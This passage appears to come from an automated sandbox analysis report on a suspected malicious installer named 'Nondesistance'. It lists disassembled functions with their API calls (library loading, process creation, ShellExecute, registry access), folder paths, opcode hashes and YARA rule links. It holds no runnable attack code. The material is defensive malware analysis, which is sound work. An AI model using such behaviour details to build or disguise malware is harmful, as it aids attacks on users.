                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Timeout
                                                                                                  • String ID: !
                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                  • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                  • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                                                  • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                  • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29
                                                                                                  Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00401FBB
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                    • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0), ref: 00404FA4
                                                                                                    • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll), ref: 00404FB6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FCB
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402045
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 2987980305-0
                                                                                                  • Opcode ID: 226b3cc8bfd4fdee517d1966db9346ceeb3fd1df807f8d727ca56e089761cf0b
                                                                                                  • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                                  • Opcode Fuzzy Hash: 226b3cc8bfd4fdee517d1966db9346ceeb3fd1df807f8d727ca56e089761cf0b
                                                                                                  • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                                                  Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                    • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\dewater\reinsmen,00000000,00000000,000000F0), ref: 00401634
                                                                                                  Strings
                                                                                                  • C:\Users\user\dewater\reinsmen, xrefs: 00401629
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                  • String ID: C:\Users\user\dewater\reinsmen
                                                                                                  • API String ID: 1892508949-140973065
                                                                                                  • Opcode ID: 7188fab01f49ece1fc3d3e3b23cf81e7f7d703405b400d5c747525d0e762397e
                                                                                                  • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                                  • Opcode Fuzzy Hash: 7188fab01f49ece1fc3d3e3b23cf81e7f7d703405b400d5c747525d0e762397e
                                                                                                  • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                                                  Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                  Strings
                                                                                                  • Error launching installer, xrefs: 004054D3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                  • String ID: Error launching installer
                                                                                                  • API String ID: 3712363035-66219284
                                                                                                  • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                  • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                                                  • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                  • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                                                  Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                    • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0), ref: 00404FA4
                                                                                                    • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll), ref: 00404FB6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                    • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                    • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 3521207402-0
                                                                                                  • Opcode ID: 29fe4d0d67873175553c7dda516071010a8a7c9ed0042aa7d9244817ba7ede81
                                                                                                  • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                                                  • Opcode Fuzzy Hash: 29fe4d0d67873175553c7dda516071010a8a7c9ed0042aa7d9244817ba7ede81
                                                                                                  • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                                                  Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000000C1,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Enum$CloseOpenValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 167947723-0
                                                                                                  • Opcode ID: 2e1c7d330be965f569518e561c755f509e7644e2f76c499267a2e8e8767b0554
                                                                                                  • Instruction ID: 651eecc7003a3be3ddeb342969b55079318d5f4ee149c111f32be82b22242bac
                                                                                                  • Opcode Fuzzy Hash: 2e1c7d330be965f569518e561c755f509e7644e2f76c499267a2e8e8767b0554
                                                                                                  • Instruction Fuzzy Hash: 6FF0AD72A04200AFEB11AF659E88EBB7A6DEB40344B10443AF505A61C0D6B849459A7A
                                                                                                  Function 00401DEA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\dewater\reinsmen,?), ref: 00401E30
                                                                                                  Strings
                                                                                                  • C:\Users\user\dewater\reinsmen, xrefs: 00401E1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExecuteShell
                                                                                                  • String ID: C:\Users\user\dewater\reinsmen
                                                                                                  • API String ID: 587946157-140973065
                                                                                                  • Opcode ID: cf3a1bfeca279b0df6f4b5d5e9d75bf75bbf282e463632b97899a83b3f580d51
                                                                                                  • Instruction ID: a548c815147b4704bf0f960bb31f45274aca7984404dfa9c911a50ac01e0136c
                                                                                                  • Opcode Fuzzy Hash: cf3a1bfeca279b0df6f4b5d5e9d75bf75bbf282e463632b97899a83b3f580d51
                                                                                                  • Instruction Fuzzy Hash: 90F0F632B141006FDB11ABB59D4AF9E27A9AB65319F20493BF141F71C2DAFC88419B28
                                                                                                  Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000000C1,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                  • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3677997916-0
                                                                                                  • Opcode ID: 9cf958dc8020beb2586e3c6158c9201faa194e5bb54263b31fc6b527f116e62c
                                                                                                  • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                                  • Opcode Fuzzy Hash: 9cf958dc8020beb2586e3c6158c9201faa194e5bb54263b31fc6b527f116e62c
                                                                                                  • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                  • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                                  • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                  • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                                  Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000000C1,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 849931509-0
                                                                                                  • Opcode ID: 3a801d9aa44324c06a66848a08f06de51ff1881c11b8b54fa6283b0d3d039f67
                                                                                                  • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                                                  • Opcode Fuzzy Hash: 3a801d9aa44324c06a66848a08f06de51ff1881c11b8b54fa6283b0d3d039f67
                                                                                                  • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                                                  Function 00401A03 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
                                                                                                  • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStringslstrcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1938659011-0
